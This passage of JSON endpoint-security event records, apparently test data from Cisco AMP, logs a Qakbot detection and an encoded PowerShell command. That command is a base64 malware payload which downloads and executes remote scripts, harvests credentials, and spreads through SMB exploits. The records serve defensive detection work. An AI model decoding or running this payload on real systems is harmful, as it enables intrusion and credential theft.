Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJ